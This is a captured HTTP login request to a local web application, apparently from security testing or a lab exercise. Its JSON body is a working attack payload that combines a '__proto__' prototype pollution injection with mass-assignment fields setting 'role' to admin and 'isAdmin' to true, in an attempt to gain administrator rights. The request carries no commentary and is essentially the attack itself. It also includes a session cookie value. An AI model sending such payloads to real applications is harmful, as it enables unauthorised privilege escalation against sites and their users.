POST /login HTTP/1.1
Host: localhost:3000
Content-Length: 214
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:3000
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:3000/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A4CUy_QiQjyREgwLhIuxpD_loecKOLK-N.X4EpuXgN0Uy0kUI1xqv6y6kdCSPTnO63X97IiiA9FhA
Connection: close

{
"__proto__": {
        "systemEntries":["hehe"]
    	},
    "username":"ao",
    "password":"aoaoao",
    "login":"Login",
		"email":   "ao@gmail.com",
"fullName":"aa",
"role":"admin",
"isAdmin":true
}